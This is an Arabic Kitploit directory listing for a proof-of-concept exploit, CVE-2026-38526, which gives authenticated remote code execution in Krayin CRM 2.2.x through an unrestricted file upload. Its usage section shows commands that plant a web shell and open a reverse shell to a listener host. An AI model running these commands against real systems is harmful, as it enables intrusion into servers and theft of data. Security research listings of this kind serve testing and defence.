Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-38526 — استغلال إثبات المفهوم لتنفيذ كود عن بعد بمصادقة في Krayin CRM الإصدار 2.2.x عبر رفع ملف غير مقيد، يدعم حمولات web shell و reverse shell. | Kitploit
أدوات/GitHubGitHub/qurclinc/cve-2026-38526
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubqurclinc/cve-2026-38526

CVE-2026-38526

استغلال إثبات المفهوم لتنفيذ كود عن بعد بمصادقة في Krayin CRM الإصدار 2.2.x عبر رفع ملف غير مقيد، يدعم حمولات web shell و reverse shell.

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-38526 - Krayin CRM RCE

الوصف

نص برهان المفهوم (PoC) لثغرة حرجة في Krayin CRM v2.2.x تسمح بتنفيذ الأوامر عن بُعد (RCE) عبر تحميل ملف غير مقيد.

الاستخدام

root@kitploit:~
# Web shell
python3 exploit.py -u http://target.com -e [email protected] -p password123

# Reverse shell
python3 exploit.py -u http://target.com -e [email protected] -p password123 -l 10.10.10.10 -P 4444

المتطلبات

  • Python 3.8+
  • requests, bs4

إخلاء المسؤولية

لأغراض تعليمية فقط.

المرجع

  • https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2026-38526/poc.md
تنزيل الأداة